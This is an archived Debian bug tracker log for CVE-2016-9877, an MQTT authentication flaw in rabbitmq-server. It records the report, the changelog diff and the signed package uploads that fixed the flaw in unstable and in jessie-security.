Debian Bug report logs -
#849849
rabbitmq-server: CVE-2016-9877
Reported by: Salvatore Bonaccorso <carnil@debian.org>
Date: Sun, 1 Jan 2017 11:15:01 UTC
Severity: grave
Tags: security, upstream
Found in versions rabbitmq-server/3.6.5-1, rabbitmq-server/3.3.5-1
Fixed in versions rabbitmq-server/3.6.6-1, rabbitmq-server/3.3.5-1.1+deb8u1
Done: Thomas Goirand <zigo@debian.org>
Bug is archived. No further changes may be made.
Toggle useless messages
Report forwarded
to debian-bugs-dist@lists.debian.org, carnil@debian.org, team@security.debian.org, secure-testing-team@lists.alioth.debian.org, PKG OpenStack <openstack-devel@lists.alioth.debian.org>:
Bug#849849; Package src:rabbitmq-server.
(Sun, 01 Jan 2017 11:15:03 GMT) (full text, mbox, link).
Acknowledgement sent
to Salvatore Bonaccorso <carnil@debian.org>:
New Bug report received and forwarded. Copy sent to carnil@debian.org, team@security.debian.org, secure-testing-team@lists.alioth.debian.org, PKG OpenStack <openstack-devel@lists.alioth.debian.org>.
(Sun, 01 Jan 2017 11:15:03 GMT) (full text, mbox, link).
Message #5 received at submit@bugs.debian.org (full text, mbox, reply):
Source: rabbitmq-server
Version: 3.6.5-1
Severity: grave
Tags: upstream security
Justification: user security hole
Hi,
the following vulnerability was published for rabbitmq-server.
CVE-2016-9877[0]:
| An issue was discovered in Pivotal RabbitMQ 3.x before 3.5.8 and 3.6.x
| before 3.6.6 and RabbitMQ for PCF 1.5.x before 1.5.20, 1.6.x before
| 1.6.12, and 1.7.x before 1.7.7. MQTT (MQ Telemetry Transport)
| connection authentication with a username/password pair succeeds if an
| existing username is provided but the password is omitted from the
| connection request. Connections that use TLS with a client-provided
| certificate are not affected.
If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.
For further information see:
[0] https://security-tracker.debian.org/tracker/CVE-2016-9877
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9877
[1] https://github.com/rabbitmq/rabbitmq-mqtt/pull/98
[2] https://github.com/rabbitmq/rabbitmq-mqtt/issues/96
Please adjust the affected versions in the BTS as needed. I was only
able to check the vulnerability sourcewise for 3.6.5 in unstable,
older version have not been checked so far.
Regards,
Salvatore
Marked as found in versions rabbitmq-server/3.3.5-1.
Request was from Salvatore Bonaccorso <carnil@debian.org>
to control@bugs.debian.org.
(Sun, 01 Jan 2017 11:21:06 GMT) (full text, mbox, link).
Added tag(s) pending.
Request was from Ondřej Kobližek <ondrej.koblizek@firma.seznam.cz >
to control@bugs.debian.org.
(Tue, 03 Jan 2017 09:06:03 GMT) (full text, mbox, link).
Message sent on
to Salvatore Bonaccorso <carnil@debian.org>:
Bug#849849.
(Tue, 03 Jan 2017 09:06:10 GMT) (full text, mbox, link).
Message #12 received at 849849-submitter@bugs.debian.org (full text, mbox, reply):
tag 849849 pending
thanks
Hello,
Bug #849849 reported by you has been fixed in the Git repository. You can
see the changelog below, and you can check the diff of the fix at:
http://git.debian.org/?p=openstack/rabbitmq-server.git;a=commitdiff;h=f2574c9
---
commit f2574c9000965f89e9462ffe276792679f3a3903
Author: Ondřej Kobližek <ondrej.koblizek@firma.seznam.cz>
Date: Mon Jan 2 15:55:07 2017 +0100
releasing package rabbitmq-server version 3.6.6-1
diff --git a/debian/changelog b/debian/changelog
index 550b29b..ce6823c 100644
--- a/debian/changelog
+++ b/debian/changelog
@@ -1,11 +1,12 @@
-rabbitmq-server (3.6.6-1) UNRELEASED; urgency=medium
+rabbitmq-server (3.6.6-1) unstable; urgency=medium
+ [ Ondřej Nový ]
* Team upload.
- * New upstream release
+ * New upstream release (Closes: #849849, CVE-2016-9877)
* d/copyright: Fixed for new release
* d/ocf: Removed, use upstream one
- -- Ondřej Nový <onovy@debian.org> Thu, 29 Dec 2016 00:49:19 +0100
+ -- Ondřej Kobližek <koblizeko@gmail.com> Mon, 02 Jan 2017 15:49:03 +0100
rabbitmq-server (3.6.5-1) unstable; urgency=medium
Reply sent
to Ondřej Kobližek <koblizeko@gmail.com>:
You have taken responsibility.
(Tue, 03 Jan 2017 09:51:08 GMT) (full text, mbox, link).
Notification sent
to Salvatore Bonaccorso <carnil@debian.org>:
Bug acknowledged by developer.
(Tue, 03 Jan 2017 09:51:08 GMT) (full text, mbox, link).
Message #17 received at 849849-close@bugs.debian.org (full text, mbox, reply):
Source: rabbitmq-server
Source-Version: 3.6.6-1
We believe that the bug you reported is fixed in the latest version of
rabbitmq-server, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 849849@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Ondřej Kobližek <koblizeko@gmail.com> (supplier of updated rabbitmq-server package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Format: 1.8
Date: Mon, 02 Jan 2017 15:49:03 +0100
Source: rabbitmq-server
Binary: rabbitmq-server
Architecture: source
Version: 3.6.6-1
Distribution: unstable
Urgency: medium
Maintainer: PKG OpenStack <openstack-devel@lists.alioth.debian.org>
Changed-By: Ondřej Kobližek <koblizeko@gmail.com>
Description:
rabbitmq-server - AMQP server written in Erlang
Closes: 849849
Changes:
rabbitmq-server (3.6.6-1) unstable; urgency=medium
.
[ Ondřej Nový ]
* Team upload.
* New upstream release (Closes: #849849, CVE-2016-9877)
* d/copyright: Fixed for new release
* d/ocf: Removed, use upstream one
Checksums-Sha1:
ef9ba3a151c5eb4a6fd5cf0b5aef987f49bb1be3 2199 rabbitmq-server_3.6.6-1.dsc
fc6dbb566981e7810c14fe04521bed2acc3f85ca 2471724 rabbitmq-server_3.6.6.orig.tar.xz
357a29ac1d066a73551024b50dc329af3cea8409 16640 rabbitmq-server_3.6.6-1.debian.tar.xz
Checksums-Sha256:
c944d1cc53d5c18b6518057bc830e71ef53dcbfddd9f7340a71fed3ae8a1987d 2199 rabbitmq-server_3.6.6-1.dsc
395689bcf57fd48aed452fcd43ff9a992de40067d3ea5c44e14680d69db7b78e 2471724 rabbitmq-server_3.6.6.orig.tar.xz
15eed57ad4fa55a54e2e89a1d298cae958c22ef718752794c0993366566e3a76 16640 rabbitmq-server_3.6.6-1.debian.tar.xz
Files:
a596792473d95713416f746eee10acf9 2199 net extra rabbitmq-server_3.6.6-1.dsc
138e334d3b5565aa4bce2a1e5b3a913c 2471724 net extra rabbitmq-server_3.6.6.orig.tar.xz
be407a291e60b38e3a1b0662991fa182 16640 net extra rabbitmq-server_3.6.6-1.debian.tar.xz
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCgAdFiEEPZg8UuuFmAxGpWCQNXMSVZ0eBksFAlhrcL0ACgkQNXMSVZ0e
BkssVA//VIjBzDuHVQnM9L7b6CTvepXrBbw3UufsoHhGz9FzBOrQL9pooMWayc3+
AW+05wPpnz9zoMjXnOGau5Fg8/LlSecx8kd+gmn+Wn+XMeiEabIFmu/x+1BObs2c
V8yMrIrllhPraBf4+Wia+XV7s3n8yzwZvgkKGNwQTmiaNKL0GAlb3jFhm3CmKfFZ
PJTnZU8DE207Y8adDepfCl1P01MrirguPNu5hBBD9Lp8gEl7W/5NozBz//m4OjIB
f54TayhRNovpVyCXCMY6mJ5XAVm+7f3bLA8Azp9wTC3GnU0cFCIxtWx43Hdne6W4
SZBMcNfMiEQY3x5VSgHhP26fmSo5e6vP5Akzw/lXd6/bDmi2lvQLFlBunsIs6Rtu
Q5Zou02hVQ63F5za79SeEeDB+H88U36gzAs2MRTWJe9pq4shteO7isHNvWp9K6Y+
hklvdCfKlfWHTYmfEVt8q/k59FUiJ/l3ZXyo2EfkbGNMADGNxMK8JxiQ2XEJK+a0
5Te1bUalT48Qu6vQCuqjPBNOUiK890BHlkGy5893+Sf0ySKSlb3UTBDtx7Ttzjbg
RNyXl5p/WKKC9XQ7kSqEdOygKjV+p57ZTkrTpmudblhOFSL4pAFui5uDFAE5Aqse
IaKiJe0ENK9uTknyC1i+4CZtklDnuVr8vK/tmKscoWd76tJNr4I=
=EGbz
-----END PGP SIGNATURE-----
Information forwarded
to debian-bugs-dist@lists.debian.org, PKG OpenStack <openstack-devel@lists.alioth.debian.org>:
Bug#849849; Package src:rabbitmq-server.
(Fri, 06 Jan 2017 01:03:03 GMT) (full text, mbox, link).
Acknowledgement sent
to Balint Reczey <balint@balintreczey.hu>:
Extra info received and forwarded to list. Copy sent to PKG OpenStack <openstack-devel@lists.alioth.debian.org>.
(Fri, 06 Jan 2017 01:03:03 GMT) (full text, mbox, link).
Message #22 received at 849849@bugs.debian.org (full text, mbox, reply):
[Message part 1 (text/plain, inline)]
Hi,
On Sun, 01 Jan 2017 12:13:30 +0100 Salvatore Bonaccorso
<carnil@debian.org> wrote:
...
>
> Hi,
>
> the following vulnerability was published for rabbitmq-server.
>
> CVE-2016-9877[0]:
> | An issue was discovered in Pivotal RabbitMQ 3.x before 3.5.8 and 3.6.x
> | before 3.6.6 and RabbitMQ for PCF 1.5.x before 1.5.20, 1.6.x before
> | 1.6.12, and 1.7.x before 1.7.7. MQTT (MQ Telemetry Transport)
> | connection authentication with a username/password pair succeeds if an
> | existing username is provided but the password is omitted from the
> | connection request. Connections that use TLS with a client-provided
> | certificate are not affected.
>
> If you fix the vulnerability please also make sure to include the
> CVE (Common Vulnerabilities & Exposures) id in your changelog entry.
>
> For further information see:
>
> [0] https://security-tracker.debian.org/tracker/CVE-2016-9877
> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9877
> [1] https://github.com/rabbitmq/rabbitmq-mqtt/pull/98
> [2] https://github.com/rabbitmq/rabbitmq-mqtt/issues/96
>
> Please adjust the affected versions in the BTS as needed. I was only
> able to check the vulnerability sourcewise for 3.6.5 in unstable,
> older version have not been checked so far.
I'm attaching a proposed patch for jessie which builds fine but has not
been tested further.
Wheezy is not affected since the vulnerable mqtt plugin is not present.
Cheers,
Balint
[0001-Auth-issue-fix-039a3c22e57bf77b325d19494a9b20cd745f1.patch (text/x-patch, attachment)]
Information forwarded
to debian-bugs-dist@lists.debian.org, PKG OpenStack <openstack-devel@lists.alioth.debian.org>:
Bug#849849; Package src:rabbitmq-server.
(Wed, 11 Jan 2017 01:45:06 GMT) (full text, mbox, link).
Acknowledgement sent
to Thomas Goirand <zigo@debian.org>:
Extra info received and forwarded to list. Copy sent to PKG OpenStack <openstack-devel@lists.alioth.debian.org>.
(Wed, 11 Jan 2017 01:45:06 GMT) (full text, mbox, link).
Message #27 received at 849849@bugs.debian.org (full text, mbox, reply):
[Message part 1 (text/plain, inline)]
Hi,
I've prepared the package here:
http://sid.gplhost.com/jessie-proposed-updates/rabbitmq-server/
Debdiff is attached (and also available from there). Please allow me to
upload.
Cheers,
Thomas Goirand (zigo)
[rabbitmq-server_3.3.5-1.1+deb8u1.debdiff (text/plain, attachment)]
Information forwarded
to debian-bugs-dist@lists.debian.org, PKG OpenStack <openstack-devel@lists.alioth.debian.org>:
Bug#849849; Package src:rabbitmq-server.
(Wed, 11 Jan 2017 06:36:03 GMT) (full text, mbox, link).
Acknowledgement sent
to Sébastien Delafond <seb@debian.org>:
Extra info received and forwarded to list. Copy sent to PKG OpenStack <openstack-devel@lists.alioth.debian.org>.
(Wed, 11 Jan 2017 06:36:03 GMT) (full text, mbox, link).
Message #32 received at 849849@bugs.debian.org (full text, mbox, reply):
On Jan/11, Thomas Goirand wrote:
> Debdiff is attached (and also available from there). Please allow me
> to upload.
Thanks for your contribution, please upload.
Cheers,
--Seb
Reply sent
to Thomas Goirand <zigo@debian.org>:
You have taken responsibility.
(Sun, 15 Jan 2017 23:06:20 GMT) (full text, mbox, link).
Notification sent
to Salvatore Bonaccorso <carnil@debian.org>:
Bug acknowledged by developer.
(Sun, 15 Jan 2017 23:06:20 GMT) (full text, mbox, link).
Message #37 received at 849849-close@bugs.debian.org (full text, mbox, reply):
Source: rabbitmq-server
Source-Version: 3.3.5-1.1+deb8u1
We believe that the bug you reported is fixed in the latest version of
rabbitmq-server, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 849849@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Thomas Goirand <zigo@debian.org> (supplier of updated rabbitmq-server package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Format: 1.8
Date: Wed, 11 Jan 2017 02:17:32 +0100
Source: rabbitmq-server
Binary: rabbitmq-server
Architecture: source all
Version: 3.3.5-1.1+deb8u1
Distribution: jessie-security
Urgency: medium
Maintainer: RabbitMQ Team <packaging@rabbitmq.com>
Changed-By: Thomas Goirand <zigo@debian.org>
Description:
rabbitmq-server - AMQP server written in Erlang
Closes: 849849
Changes:
rabbitmq-server (3.3.5-1.1+deb8u1) jessie-security; urgency=medium
.
* CVE-2016-9877: apply backported upstream patch (Closes: #849849).
Checksums-Sha1:
bb6ba8064f84de074a3a5b4e7fa0bad6e2b4083f 1893 rabbitmq-server_3.3.5-1.1+deb8u1.dsc
f945dd837ce637677b2d80b6fe14ef665233731d 3648221 rabbitmq-server_3.3.5.orig.tar.gz
01aa51850b772519e041c3ff49d774d25a9fb024 28801 rabbitmq-server_3.3.5-1.1+deb8u1.diff.gz
dbf7b2c3bf9e16ae6149ad4b9370985149b56d06 4118512 rabbitmq-server_3.3.5-1.1+deb8u1_all.deb
Checksums-Sha256:
1dd6224ca08aeb7f120ecd01725221fa181312b17e3e749bea36a6a4814cfc1a 1893 rabbitmq-server_3.3.5-1.1+deb8u1.dsc
7a6bf8af684b2087a1c534ffcd2db1b7c15b137a38bb9f00dfdf0227f69d70c2 3648221 rabbitmq-server_3.3.5.orig.tar.gz
4978240807984e2d03194168d954463f34395124a571c6ed58f2c1676928c078 28801 rabbitmq-server_3.3.5-1.1+deb8u1.diff.gz
2c8e448754603787195aa05b80c3c4149768310182cccfcb82b460db7bc7ad0f 4118512 rabbitmq-server_3.3.5-1.1+deb8u1_all.deb
Files:
dfbaf4ea247eafe3a6675527d01ffe6d 1893 net extra rabbitmq-server_3.3.5-1.1+deb8u1.dsc
3bf0c4be1aaa6fdb483470aba14a6c81 3648221 net extra rabbitmq-server_3.3.5.orig.tar.gz
f4e9b1687b8ae8a55253415ef1a70083 28801 net extra rabbitmq-server_3.3.5-1.1+deb8u1.diff.gz
4f60376adf694ace8772f2eefe0b21bc 4118512 net extra rabbitmq-server_3.3.5-1.1+deb8u1_all.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIcBAEBCAAGBQJYdYx9AAoJENQWrRWsa0P+yd4QAJwqQZflz4+nyn+Yx2l6jBSM
ZA1aOYia0ud06WWgMHDvRSLGDGSSd9fyRD5Nquj6dxtqjD3QDey4f8c4Y+GPvSZR
SQatrYrpojEHsCJCfXdis+YZIy8WvfzgutFlGYA7ui/QmU5hJv9H8PjmcT1U+1Nj
mYX0E1mPBn0eJlNud2wtX2gdyHiTbYMrVaGXmHWTGLy1dTFe76U/e4Wzi3/zf4sD
gN16mbsyqpYoTt2wEpdrjzKWL/8zdM3COJfW1mt3vggx/oeXSDPXV86KE4ZEesvU
7a4SvIBl1ktkBHZGj547CTm43jFKK+z+6JFT2hMcwqKSg/AsiDtaEOPQjdPnbzwC
8sFLLjt3pKhgQsPAgerqWfte5mb8465YXBPN6Rpu5wqech4IOnFpqiERqmKmF/He
FzMy7H7xRZl/E/dzdUwVImDGVqTGaADSoJ1MjwtFBwHsPrneLToN9xyetQA9vgBn
yUYVj4ZYp68HbbBNy/p9omSxTQTPBEkCqYXKwU4Rsrd5BZb7/uhWsxohVUqQLdZ6
rkilpeZ+5WbP/+b0WO1ko7u71/q5rvcYX1y4pHsIbZd/0ZdxUyClOPbO/9YvspKp
Wh6sHNx2cpjld8o+zfykXBjvynuU26z+am3kmUHrT6I8pUhir2vyS/uyQIMdCVcD
G4D8dwmTkTfZEOo16jmm
=lHa6
-----END PGP SIGNATURE-----
Bug archived.
Request was from Debbugs Internal Request <owner@bugs.debian.org>
to internal_control@bugs.debian.org.
(Sun, 07 May 2017 07:28:53 GMT) (full text, mbox, link).
Send a report that this bug log contains spam.
Debian bug tracking system administrator <owner@bugs.debian.org>.
Last modified:
Wed Jun 19 13:53:33 2019;
Machine Name:
buxtehude
Debian Bug tracking system
Debbugs is free software and licensed under the terms of the GNU
Public License version 2. The current version can be obtained
from https://bugs.debian.org/debbugs-source/.
Copyright © 1999 Darren O. Benham,
1997,2003 nCipher Corporation Ltd,
1994-97 Ian Jackson,
2005-2017 Don Armstrong, and many other contributors.
Vulmon